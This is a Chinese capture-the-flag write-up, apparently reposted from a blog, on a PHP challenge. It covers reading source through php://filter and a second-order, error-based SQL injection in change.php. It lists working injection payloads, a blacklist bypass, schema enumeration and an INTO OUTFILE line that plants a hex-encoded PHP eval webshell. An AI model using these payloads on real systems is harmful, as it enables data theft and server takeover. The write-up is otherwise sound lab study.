文件包含、php://filter读源码:
在index.php中,查看一些网页源码。提示?file=?,可以猜到应该是文件包含,尝试GET传参即可读取到,用php://filter读取
?file=php://filter/convert.base64-encode/resource=index.php
读取index.php、change.php、delete.php、search.php、confirm.php、config.php这些文件,反正我是只知道这么了
分析源码
这里只分析change.php文件,因为这里才能利用(本菜鸡的看法),当然一开始肯定不知道利用点在change.php,就像我一开始认为可以在其他文件利用,反正一开始要全部审计一次才知道。
//confirm.php
<?php
require_once "config.php";
//var_dump($_POST);
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = $_POST["address"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{
$user_name}' and `phone`='{
$phone}'";
$fetch = $db->query($sql);
}
if($fetch->num_rows>0) {
$msg = $user_name."已提交订单";
}else{
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)"; //address
$re = $db->prepare($sql);
$re->bind_param("sss", $user_name, $address, $phone);
$re = $re->execute();
if(!$re) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单提交成功";
}
} else {
$msg = "信息不全";
}
?>
confirm.php处理我们一开始提交的订单。对username和phone进行黑名单过滤,而address只是被addslashes函数进行特殊字符的转义,然后直接拼接到SQL语句中。如果该订单的username在数据库中不存在,就会创建此订单并存入数据库
//change.php
<?php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{
$user_name}' and `phone`='{
$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
注意change.php中的print_r($db->error);可以想到报错注入的方式,只需要我们提供对应的username和phone就能调取数据库中的address然后执行update语句,如果报错了就打印错误信息
所以重点是我们将构造的代码一开始放进数据库中,然后通过修改订单就可触发数据库中的恶意代码执行SQL语句从而报错!
二次注入 联合 报错注入:
1' || extractvalue(1,concat(0x7e,substr((select load_file("/flag.txt")),1,32),0x7e));-- -
后言:
为什么是选择load_file()函数,且为什么读取的路径是/flag.txt。这些东西我也解释不清,反正我一开始尝试延时注入、bool盲注、写shell、union select读表…都失败了,很奇怪…
但这题也提示了我注意load_file()读取外部文件这种操作,还是蛮有意思的
下面是我做题时尝试的payload,感受一下当时的绝望…
1' || if(1=1,1,0) -- -xxx 正常回显
1' || if(1=1,1,0) -- -Union 不正常回显
1' || if(1=1,1,0) -- -Uni/**/on 正常回显,说明可以/**/绕过黑名单
payload="1' || if(ascii(substr((sele/**/ct/**/group_concat(table_name)from(information_schema.tables)whe/**/re(table_schema=database())),{},1))<{},1,0)-- -".format(i,mid)
1' || extractvalue(1,concat(0x7e,(select user()),0x7e));-- -
1' || extractvalue(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),20,32),0x7e));-- -
information_schema,ctftraining,inrformance_schema,test,ctfusers
1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e));-- -
1' || extractvalue(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='user'),15,32),0x7e));-- -
Host,User,Password,Select_priv,Insert_priv,Up
1' || extractvalue(1,concat(0x7e,substr((select group_concat(0x55736572) from ctfusers.user),1,32),0x7e));-- -
@@basedir @@datadir
/usr /var/lib/mysql/
1' into outfile "/var/www/html/1.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e -- -
1' || extractvalue(1,concat(0x7e,substr((select load_file("/flag.txt")),1,32),0x7e));-- -
转载:https://blog.csdn.net/weixin_45669205/article/details/115959921
查看评论